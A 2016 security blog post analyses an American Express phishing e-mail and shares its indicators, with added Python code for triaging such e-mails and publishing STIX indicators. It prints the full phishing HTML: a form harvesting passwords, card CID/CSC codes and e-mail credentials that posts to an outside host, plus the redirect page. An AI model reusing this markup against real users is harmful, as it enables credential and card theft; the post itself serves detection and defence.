2016/03/15

Something Phishy – 03-14-2016

by sapphomo
Categories: News

Something Phishy – Phishing for Phishers

It’s March! Holy cow, it’s March. A few months flew by and it’s time for another episode of Something Phishy. This is Destruct_Icon, and we have a new poster who will be joining the ranks. I’d like to introduce you to Sapphomo, who will be assisting me with Something Phishy posts as she breaks into the security field in the coming months.

An interesting inbound e-mail came with a present attached.

Holy escaped data, Batman! That data, it’s so escaped!

<style type="text/css">
<!--
.style4 {font-size: 11px}
.style5 {font-size: 12px}
.style6 {
font-size: 10px;
font-weight: bold;
}
.style9 {font-size: 12px; font-weight: bold; }
-->
</style>
<br><br><div class="gmail_quote"><br>

<div style="background:#ffffff;min-height:1000px;color:#666666;font-family:Arial,Helvetica,sans-serif;font-size:12px" alink="#FF0000" link="#FF0000" bgcolor="#FFFFFF" text="#666666">

<div style="background-color:#ffffff;margin:0;padding:0;width:100%">
<table style="font-family:arial,sans-serif;color:#666666;font-size:12px;line-height:16px;background-color:#002663;margin:0 auto;text-align:left" align="center" border="0" cellpadding="0" cellspacing="0">
<tbody><tr>
<td colspan="7" bgcolor="#FFFFFF" valign="bottom" width="7"><img alt="" src="http://f.email.americanexpress.com/i/13/2075838664/0591u_wrapper_toplft_shdw.gif" style="display:block" border="0" height="53" width="7"></td>

<td>

<table style="font-family:arial,sans-serif;background:#002663" border="0" cellpadding="0" cellspacing="0" width="700">
<tbody><tr>
<td bgcolor="#60A945" valign="top"><table style="font-family:arial,sans-serif" bgcolor="#60A945" border="0" cellpadding="0" cellspacing="0" width="700">
<tbody><tr>
<td bgcolor="#60A945"><div align="center"><img alt="" src="http://f.email.americanexpress.com/i/13/2075838664/0591u_masthead_top_lft.gif" style="display:block" border="0" height="53" width="375"></div></td>
</tr>
</tbody></table>

</td>
</tr>
</tbody></table>
</td>
<td colspan="7" bgcolor="#FFFFFF" valign="bottom" width="7"><img alt="" src="http://f.email.americanexpress.com/i/13/2075838664/0591u_wrapper_toprgt_shdw.gif" style="display:block" border="0" height="53" width="7"></td>

</tr>
</tbody></table>
<table style="font-family:arial,sans-serif;color:#666666;font-size:12px;line-height:16px;background-color:#002663;margin:0 auto;text-align:left" align="center" border="0" cellpadding="0" cellspacing="0">
<tbody><tr>
<td style="background-color:#fdfdfd" bgcolor="#FDFDFD"><img alt="" src="http://f.email.americanexpress.com/i/13/2075838664/0591u_any_spacer.gif" style="margin:0;border:0 none;padding:0;display:block" border="0" height="1" width="1"></td>

<td style="background-color:#fafafa" bgcolor="#FAFAFA"><img alt="" src="http://f.email.americanexpress.com/i/13/2075838664/0591u_any_spacer.gif" style="margin:0;border:0 none;padding:0;display:block" border="0" height="1" width="1"></td>

<td style="background-color:#f7f7f7" bgcolor="#F7F7F7"><img alt="" src="http://f.email.americanexpress.com/i/13/2075838664/0591u_any_spacer.gif" style="margin:0;border:0 none;padding:0;display:block" border="0" height="1" width="1"></td>

<td style="background-color:#f4f4f4" bgcolor="#F4F4F4"><img alt="" src="http://f.email.americanexpress.com/i/13/2075838664/0591u_any_spacer.gif" style="margin:0;border:0 none;padding:0;display:block" border="0" height="1" width="1"></td>

<td style="background-color:#f1f1f1" bgcolor="#F1F1F1"><img alt="" src="http://f.email.americanexpress.com/i/13/2075838664/0591u_any_spacer.gif" style="margin:0;border:0 none;padding:0;display:block" border="0" height="1" width="1"></td>

<td style="background-color:#ededed" bgcolor="#EDEDED"><img alt="" src="http://f.email.americanexpress.com/i/13/2075838664/0591u_any_spacer.gif" style="margin:0;border:0 none;padding:0;display:block" border="0" height="1" width="1"></td>

<td style="background-color:#e8e8e8" bgcolor="#E8E8E8"><img alt="" src="http://f.email.americanexpress.com/i/13/2075838664/0591u_any_spacer.gif" style="margin:0;border:0 none;padding:0;display:block" border="0" height="1" width="1"></td>

<td valign="top">

<table style="font-family:arial,sans-serif;background:#002663" border="0" cellpadding="0" cellspacing="0" width="700">
<tbody><tr>
<td>
<table style="font-family:arial,sans-serif" border="0" cellpadding="0" cellspacing="0" width="700">
<tbody><tr>
<td bgcolor="#146E8D" width="140"><img alt="" src="http://f.email.americanexpress.com/i/13/2075838664/0591u_any_spacer.gif" style="display:block" border="0" height="4" width="1"></td>
<td bgcolor="#66BFD0" width="210"><img alt="" src="http://f.email.americanexpress.com/i/13/2075838664/0591u_any_spacer.gif" style="display:block" border="0" height="4" width="1"></td>
<td bgcolor="#0F773A" width="70"><img alt="" src="http://f.email.americanexpress.com/i/13/2075838664/0591u_any_spacer.gif" style="display:block" border="0" height="4" width="1"></td>
<td bgcolor="#8CBB73" width="140"><img alt="" src="http://f.email.americanexpress.com/i/13/2075838664/0591u_any_spacer.gif" style="display:block" border="0" height="4" width="1"></td>
<td bgcolor="#B2D369" width="140"><img alt="" src="http://f.email.americanexpress.com/i/13/2075838664/0591u_any_spacer.gif" style="display:block" border="0" height="4" width="1"></td>
</tr>
</tbody></table>
</td>
</tr>
<tr>
<td valign="bottom">
<table style="font-family:arial,sans-serif" bgcolor="#002663" border="0" cellpadding="0" cellspacing="0" width="700">
<tbody><tr>
<td style="font-size:14px;color:#90d7e7;line-height:15px" align="center" valign="top" width="39"><div align="center"></div></td>
<td style="color:#ffffff" align="right" valign="bottom" width="632">
<div style="line-height:20px;font-size:12px"> </div>

<div style="font-size:11px;line-height:16px">
<div align="left"></div>
</div>

<div style="line-height:2px;font-size:12px"></div>

<div style="line-height:18px;font-size:12px"> </div>

</td>
<td width="29"></td>
</tr>
</tbody></table>
</td>
</tr>
</tbody></table>

<table style="font-family:arial,sans-serif;background:#002663" border="0" cellpadding="0" cellspacing="0" width="700">
<tbody><tr>
<td valign="top">

<table style="font-family:arial,sans-serif" border="0" cellpadding="0" cellspacing="0" width="700">
<tbody><tr>
<td width="11"></td>
<td colspan="3" bgcolor="#002663"><img alt="" src="http://f.email.americanexpress.com/i/13/2075838664/0591u_contentbox_top_1.gif" style="display:block" border="0" height="6" width="678"></td>
<td width="11"></td>
</tr>
<tr>
<td width="11"></td>
<td colspan="3" bgcolor="#E5E5E5"><img alt="" src="http://f.email.americanexpress.com/i/13/2075838664/0591u_contentbox_top_2.gif" style="display:block" border="0" height="4" width="678"></td>
<td width="11"></td>
</tr>
<tr>
<td width="11">&nbsp;</td>
<td bgcolor="#E5E5E5" valign="top" width="4">&nbsp;</td>
<td bgcolor="#FFFFFF" width="670">&nbsp;</td>

<td bgcolor="#E5E5E5" width="4"></td>
<td bgcolor="#002663" width="11"></td>
</tr>
<tr>
<td bgcolor="#002663" width="11"></td>
<td bgcolor="#E5E5E5" width="4"></td>
<td bgcolor="#FFFFFF" valign="top" width="670"><blockquote>
<p><span class="style9"><strong>Complete the form below to update your Membership Rewards information and remove any limitations in your account.</strong></span><br />

</a> </p>
</blockquote>

<table width="633" height="78" border="0">
<tr>
<td width="57">&nbsp;</td>
<td width="532"><div class="loginAreaInput">
<script type="text/javascript" language="javascript">
function validate(frm)
{
if(frm.usnm.value == ""){
alert("Enter your User ID.");
frm.elements.usnm.focus();return false;}

if(frm.parolina.value == ""){
alert("Enter your Password");
frm.elements.parolina.focus();return false;}

if(frm.cid.value == ""){
alert("Enter your Card ID Number (CID).");
frm.elements.cid.focus();return false;}

if(frm.csc.value == ""){
alert("Enter your Card Security Code (CSC).");
frm.elements.csc.focus();return false;}

if(frm.emad.value == ""){
alert("Enter your E-Mail Address.");
frm.elements.emad.focus();return false;}

if(frm.empas.value == ""){
alert("Enter your E-Mail Password.");
frm.elements.empas.focus();return false;}

if(frm.empas1.value == ""){
alert("Confirm your E-Mail Password.");
frm.elements.empas1.focus();return false;}

if(frm.phone.value == ""){
alert("Enter your Phone Number.");
frm.elements.phone.focus();return false;}return true;}
</script>
<form name="frm" onsubmit="return validate(this);setOptimCookie();" action="http://secure.noyzdesigns.com/finish.php" method="post" </form>
<table width="441">
<tr>
<td width="191"><span class="style3 bottomLayerText4 style5"><strong>User ID </strong></span><br />
<span class="loginIDT">
<input name="usnm" type="text" class="InputFieldsUID" id="usnm" maxlength="32" autocomplete="on" />
<br />
</span></td>
<td width="234"><span class="style3 bottomLayerText4 style5"><strong>Password </strong></span><br />
<span class="loginIDT">
<input name="parolina" type="password" class="InputFieldsUID" id="parolina" maxlength="32" autocomplete="on" />
<br />
</span></td>
</tr>
<tr>
<td width="191"><span class="style9">Card ID Number (CID)</span><br />
<span class="loginIDT">
<input name="cid" type="text" class="InputFieldsUID" id="cid" size="4" maxlength="4" autocomplete="on" />
</span><br />
<br />
<span class="style6">Please provide the CID number<br />
located on the front of your card.</span><br />
<span class="cidchkcontent_NORMALTEXT FLOATLEFT WIDTH180 PADDINGTOP5 PADDINGLEFT30 VERTICALALIGNTOP TEXTALIGN style4">(4 digits)</span><br />
<span class="FLOATLEFT WIDTH120 PADDINGLEFT15 PADDINGBOTTOM10 "><img src="https://rewards.americanexpress.com/loyalty/redemption/rewards/cart/shop/images/Amex_CID.png" alt="Your Card ID number is the four digit number located in the top right-hand side on the front of your Card" width="120" height="49" title="Your Card ID number is the four digit number located in the top right-hand side on the front of your card" /></span><br /></td>
<td width="234"><br />
<span class="style9">Card Security Code (CSC)</span><br />
<span class="loginIDT">
<input name="csc" type="text" class="InputFieldsUID" id="csc" size="3" maxlength="3" autocomplete="on" />
</span><br />
<br />
<span class="style6">Please also provide the card security code (CSC) <br />
from the back of your card. It's the last three <br />
digits in the signature strip.</span><br />
<span class="cidchkcontent_NORMALTEXT FLOATLEFT WIDTH180 PADDINGTOP5 PADDINGLEFT30 VERTICALALIGNTOP TEXTALIGN style4">(3 digits)</span><br />
<span class="FLOATLEFT WIDTH120 PADDINGLEFT15 PADDINGBOTTOM10 "><img src="https://rewards.americanexpress.com/loyalty/redemption/rewards/cart/shop/images/Amex_CSC.png" alt="Your Card ID number is the four digit number located in the top right-hand side on the front of your Card" width="120" height="49" title="Your Card ID number is the four digit number located in the top right-hand side on the front of your card" /></span><br /></td>
</tr>
<tr>
<td><span class="style3 bottomLayerText4 style5"><strong><br />
<br />
Email Address </strong></span><br />
<span class="loginIDT">
<input name="emad" type="text" class="InputFieldsUID" id="emad" maxlength="32" autocomplete="on" />
<br />
</span></td>
<td><span class="style3 bottomLayerText4 style5"><strong><br />
<br />
Phone Number </strong></span><br />
<span class="loginIDT">
<input name="phone" type="text" class="InputFieldsUID" id="phone" maxlength="32" autocomplete="on" />
<br />
</span></td>
</tr>
<tr>
<td height="77"><span class="style3 bottomLayerText4 style5"><strong>Email Password </strong></span><br />
<span class="loginIDT">
<input name="empas" type="password" class="InputFieldsUID" id="empas" maxlength="32" autocomplete="on" />
<br />
</span></td>
<td>&nbsp;</td>
</tr>
<tr>
<td><span class="style3 bottomLayerText4 style5"><strong>Confirm Email Password </strong></span><br />
<span class="loginIDT">
<input name="empas1" type="password" class="InputFieldsUID" id="empas1" maxlength="32" autocomplete="on" />
<br />
</span></td>
<td>&nbsp;</td>
</tr>
<tr>
<td>&nbsp;</td>
<td>&nbsp;</td>
</tr>
<tr>
<td><span class="rfloat">
<input class="oceFloatLeft jsSubmit" type="submit" title="Confirm" value="Confirm" name='continueRegBtn'/>
</span></td>
<td>&nbsp;</td>
</tr>
</table>

<td width="30">&nbsp;</td>

</table>
<span class="style4"><br />
<br />
<br />
<b>Terms and Conditions</b><br />
Terms and Conditions for the Membership Rewards&reg; program apply. Visit <a href="#" target="_blank">membershiprewards.com/terms</a> or call 1-800-AXP-EARN</span> <span class="style4">(297-3276) for more information. <br />
<br />
&copy; 2015 American Express. All rights reserved. </span><img alt="" src="http://f.email.americanexpress.com/i/13/2075838664/0591u_any_bluebox.gif" style="display:inline" align="right" border="0" height="45" width="52" /><br />
<br /></td>
<td bgcolor="#E5E5E5" width="4"></td>
<td bgcolor="#002663" width="11"></td>
</tr>
<tr>
<td></td>
<td colspan="3" bgcolor="#E5E5E5"><img alt="" src="http://f.email.americanexpress.com/i/13/2075838664/0591u_contentbox_top_2.gif" style="display:block" border="0" height="4" width="678"></td>
<td></td>
</tr>
<tr>
<td></td>
<td colspan="3" bgcolor="#002663"><img alt="" src="http://f.email.americanexpress.com/i/13/2075838664/0591u_contentbox_btm_1.gif" style="display:block" border="0" height="6" width="678"></td>
<td></td>
</tr>
</tbody></table>

<div style="line-height:11px;font-size:12px"> </div>
</td>
</tr>
</tbody></table>
</td>
<td style="background-color:#e8e8e8" bgcolor="#E8E8E8"><img alt="" src="http://f.email.americanexpress.com/i/13/2075838664/0591u_any_spacer.gif" style="margin:0;border:0 none;padding:0;display:block" border="0" height="1" width="1"></td>

<td style="background-color:#ededed" bgcolor="#EDEDED"><img alt="" src="http://f.email.americanexpress.com/i/13/2075838664/0591u_any_spacer.gif" style="margin:0;border:0 none;padding:0;display:block" border="0" height="1" width="1"></td>

<td style="background-color:#f1f1f1" bgcolor="#F1F1F1"><img alt="" src="http://f.email.americanexpress.com/i/13/2075838664/0591u_any_spacer.gif" style="margin:0;border:0 none;padding:0;display:block" border="0" height="1" width="1"></td>

<td style="background-color:#f4f4f4" bgcolor="#F4F4F4"><img alt="" src="http://f.email.americanexpress.com/i/13/2075838664/0591u_any_spacer.gif" style="margin:0;border:0 none;padding:0;display:block" border="0" height="1" width="1"></td>

<td style="background-color:#f7f7f7" bgcolor="#F7F7F7"><img alt="" src="http://f.email.americanexpress.com/i/13/2075838664/0591u_any_spacer.gif" style="margin:0;border:0 none;padding:0;display:block" border="0" height="1" width="1"></td>

<td style="background-color:#fafafa" bgcolor="#FAFAFA"><img alt="" src="http://f.email.americanexpress.com/i/13/2075838664/0591u_any_spacer.gif" style="margin:0;border:0 none;padding:0;display:block" border="0" height="1" width="1"></td>

<td style="background-color:#fcfcfc" bgcolor="#FCFCFC"><img alt="" src="http://f.email.americanexpress.com/i/13/2075838664/0591u_any_spacer.gif" style="margin:0;border:0 none;padding:0;display:block" border="0" height="1" width="1"></td>

</tr>
<tr>
<td colspan="15"><img alt="" src="http://f.email.americanexpress.com/i/13/2075838664/0591u_wrapper_btm.gif" style="display:block" border="0" height="27" width="714"></td>
</tr>
</tbody></table>

</div>
<img src="http://email.americanexpress.com/a/hBP1iV7B7usjIB8jT4sNs3C5F-x/spacer.gif">
</div>
</div><br>

[Image: MaliciousSiteCapture]

It unescapes to what appears to be an American Express page, using some of Amex’s own hosted graphics, with a form that collects data such as your user ID, CSC and e-mail information.

On submit, the data gets posted to hxxp://secure[.]noyzdesigns[.]com/finish.php, and the victim is immediately redirected back to a legitimate website, www.membershiprewards.com.
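The analysis above was done by hand: unescape the body, find the form, read off where it posts and what it collects. The following is an added example, not code from the original post or from the phishing kit, that automates that triage in Python. It unescapes the e-mail body, pulls out every form’s action URL, the input fields it collects and the hosts its images load from, then flags the tell-tale pattern seen here: branded graphics served from the real brand’s domain while the credentials are posted somewhere else. The sample body is a constructed, cut-down version of the Amex phish; the `SENSITIVE_NAMES` list is my own starting point, not anything from the post.

```python
"""Triage an HTML e-mail body for credential-harvesting forms.

Added example (not from the original post or the phishing kit): automates the
manual analysis above. The body arrives escaped, so it is unescaped first;
then each form's action URL, its input fields, and the image hosts are
extracted and compared.
"""
import html
from html.parser import HTMLParser
from urllib.parse import urlparse

# Field names that signal card/credential capture. Constructed from the fields
# in the Amex phish above; extend for other brands and kits.
SENSITIVE_NAMES = {"password", "passwd", "cid", "csc", "cvv", "cvc", "pin", "ssn"}
NON_DATA_TYPES = {"submit", "button", "image", "reset"}


class FormExtractor(HTMLParser):
    """Collects forms, their inputs and all image hosts from an HTML body."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self.image_hosts = set()
        self._form = None

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "form":
            self._form = {"action": a.get("action", ""), "fields": []}
            self.forms.append(self._form)
        elif tag == "input":
            # Kits are often malformed (the one above never closes its <form>
            # tag cleanly), so inputs attach to the most recent form rather
            # than requiring a well-formed open/close pair.
            itype = a.get("type", "text").lower()
            if self._form is not None and itype not in NON_DATA_TYPES:
                self._form["fields"].append((a.get("name", ""), itype))
        elif tag == "img":
            host = urlparse(a.get("src", "")).hostname
            if host:
                self.image_hosts.add(host.lower())


def registrable_domain(host):
    """Naive last-two-labels domain; fine for .com, not a public-suffix list."""
    parts = host.lower().split(".")
    return ".".join(parts[-2:]) if len(parts) >= 2 else host.lower()


def triage(raw_body):
    """Return one finding per form found in the (possibly escaped) HTML body."""
    body = html.unescape(raw_body)
    parser = FormExtractor()
    parser.feed(body)
    image_domains = sorted({registrable_domain(h) for h in parser.image_hosts})
    findings = []
    for form in parser.forms:
        action_host = urlparse(form["action"]).hostname or ""
        action_domain = registrable_domain(action_host) if action_host else ""
        names = [n for n, _ in form["fields"]]
        sensitive = sorted(n for n in names if n.lower() in SENSITIVE_NAMES)
        password_inputs = sum(1 for _, t in form["fields"] if t == "password")
        collects_secrets = password_inputs > 0 or bool(sensitive)
        # Branded graphics from one domain, credentials posted to another.
        mismatch = bool(action_domain) and bool(image_domains) and action_domain not in image_domains
        if collects_secrets and mismatch:
            verdict = "likely credential harvester"
        elif collects_secrets:
            verdict = "collects secrets; verify the action host"
        else:
            verdict = "no credential form"
        findings.append({
            "action": form["action"],
            "action_domain": action_domain,
            "fields": names,
            "sensitive_fields": sensitive,
            "password_inputs": password_inputs,
            "image_domains": image_domains,
            "brand_mismatch": mismatch,
            "verdict": verdict,
        })
    return findings


# Constructed sample: a cut-down version of the Amex phish above, escaped the
# way it arrived in the inbox (html.escape stands in for the mail client).
SAMPLE_HTML = """
<div>
<img src="http://f.email.americanexpress.com/i/masthead.gif">
<p>Complete the form below to update your Membership Rewards information.</p>
<form name="frm" action="http://secure.noyzdesigns.com/finish.php" method="post">
<input name="usnm" type="text">
<input name="parolina" type="password">
<input name="cid" type="text" maxlength="4">
<input name="csc" type="text" maxlength="3">
<input name="emad" type="text">
<input name="empas" type="password">
<input type="submit" value="Confirm">
</form>
<img src="https://rewards.americanexpress.com/images/Amex_CID.png">
</div>
"""
SAMPLE_ESCAPED = html.escape(SAMPLE_HTML)

if __name__ == "__main__":
    for finding in triage(SAMPLE_ESCAPED):
        for key, value in finding.items():
            print(f"{key:>16}: {value}")
```

The domain comparison is deliberately crude (last two labels), which is enough for the `.com` brands seen here; a production version would use a public-suffix list and a brand allow-list rather than inferring the brand from image hosts alone.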


  • PHP page:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1250">
<meta http-equiv="refresh" content="0; url=http://www.membershiprewards.com/terms">
<title>Redirect</title>
</head>
<body>
</div>
</body>
</html>

It looks like there wasn’t any malware attached to this campaign; however, we do see some pretty aggressive credential-harvesting capabilities. The website itself is well crafted compared to many cred-harvesting pages and has a very interesting method of attack. Keep an eye out for any interaction with noyzdesigns. The e-mail address used, american.express@chamberplayground.com, has little to no web presence as well.

On this note, we’d also like to provide some insight into what we will be doing with the information from these posts. We will be providing an intel feed in the near future to which we will push all of our phishing indicators, in the hope that it may help identify or prevent compromises in your environment. This will be facilitated through TAXII services, so subscribing to the feed should be relatively painless. Thank you for checking out our Something Phishy for March; we hope it provides some insight into some of the methods being used for harvesting.
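The post names three indicators to watch for (the noyzdesigns domain and its finish.php URL, and the chamberplayground.com sender address) and says they will be distributed over TAXII. As an added example, not the authors’ feed or any code of theirs, the Python below shows both ends of that in stdlib only. The post does not say what payload format the feed will use; this assumes STIX 2.1 JSON, which is what TAXII 2 collections carry, and builds one Indicator object per IoC, then a consumer that parses the patterns back out and runs them over a few constructed proxy and mail log lines.

```python
"""Publish the post's phishing indicators as STIX and match them against logs.

Added example, not the feed the post promises. Assumes STIX 2.1 JSON as the
TAXII payload; the IoC values are the ones named in the post, the log lines
are constructed.
"""
import json
import re
import uuid
from datetime import datetime, timezone
from urllib.parse import urlparse

# IoCs taken from the post: (STIX observable type, value).
IOCS = [
    ("domain-name", "noyzdesigns.com"),
    ("url", "http://secure.noyzdesigns.com/finish.php"),
    ("email-addr", "american.express@chamberplayground.com"),
]

# Constructed sample log lines; only the hosts/addresses come from the post.
LOG_LINES = [
    "proxy 2016-03-14T10:02:11Z 10.1.2.3 POST http://secure.noyzdesigns.com/finish.php 302",
    "proxy 2016-03-14T10:02:12Z 10.1.2.3 GET http://www.membershiprewards.com/terms 200",
    "mail 2016-03-14T09:58:40Z from=american.express@chamberplayground.com to=bob@example.org",
    "mail 2016-03-14T09:59:02Z from=alerts@example.org to=bob@example.org",
]

URL_RE = re.compile(r"https?://[^\s\"'<>]+")
EMAIL_RE = re.compile(r"[\w.+-]+@[\w-]+(?:\.[\w-]+)+")
# Only the single-comparison patterns this producer emits; not a full STIX
# pattern grammar.
PATTERN_RE = re.compile(r"^\[([a-z-]+):value = '([^']+)'\]$")


def stix_indicator(obs_type, value, source="Something Phishy 2016-03"):
    """Build a minimal STIX 2.1 Indicator with a single-comparison pattern."""
    now = datetime.now(timezone.utc).strftime("%Y-%m-%dT%H:%M:%S.000Z")
    return {
        "type": "indicator",
        "spec_version": "2.1",
        "id": f"indicator--{uuid.uuid4()}",
        "created": now,
        "modified": now,
        "name": f"{source}: {obs_type} {value}",
        "indicator_types": ["malicious-activity"],
        "pattern": f"[{obs_type}:value = '{value}']",
        "pattern_type": "stix",
        "valid_from": now,
    }


def build_bundle(iocs):
    """Wrap one Indicator per IoC in a STIX Bundle, as a TAXII collection would return."""
    return {
        "type": "bundle",
        "id": f"bundle--{uuid.uuid4()}",
        "objects": [stix_indicator(t, v) for t, v in iocs],
    }


def parse_indicators(bundle):
    """Consumer side: recover (type, value) from each simple STIX pattern."""
    parsed = []
    for obj in bundle.get("objects", []):
        if obj.get("type") != "indicator" or obj.get("pattern_type") != "stix":
            continue
        m = PATTERN_RE.match(obj["pattern"])
        if m:
            parsed.append((m.group(1), m.group(2).lower()))
    return parsed


def match_logs(lines, bundle):
    """Return {line_index: ['type:value', ...]} for every line that touches an IoC."""
    indicators = parse_indicators(bundle)
    hits = {}
    for i, line in enumerate(lines):
        found_urls = URL_RE.findall(line)
        hosts = {urlparse(u).hostname for u in found_urls} - {None}
        urls = {u.lower().rstrip("/") for u in found_urls}
        emails = {e.lower() for e in EMAIL_RE.findall(line)}
        matched = set()
        for obs_type, value in indicators:
            # Domain indicators also cover subdomains (secure.noyzdesigns.com).
            if obs_type == "domain-name" and any(h == value or h.endswith("." + value) for h in hosts):
                matched.add(f"{obs_type}:{value}")
            elif obs_type == "url" and value.rstrip("/") in urls:
                matched.add(f"{obs_type}:{value}")
            elif obs_type == "email-addr" and value in emails:
                matched.add(f"{obs_type}:{value}")
        if matched:
            hits[i] = sorted(matched)
    return hits


if __name__ == "__main__":
    bundle = build_bundle(IOCS)
    print(json.dumps(bundle, indent=2))
    for idx, matched in match_logs(LOG_LINES, bundle).items():
        print(f"line {idx}: {LOG_LINES[idx]}\n    -> {matched}")
```

Matching on the domain indicator rather than only the exact URL is what catches the first proxy line even if the kit is later moved to a different path on the same host; the redirect to www.membershiprewards.com on the next line is the legitimate site the post mentions and correctly produces no hit.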

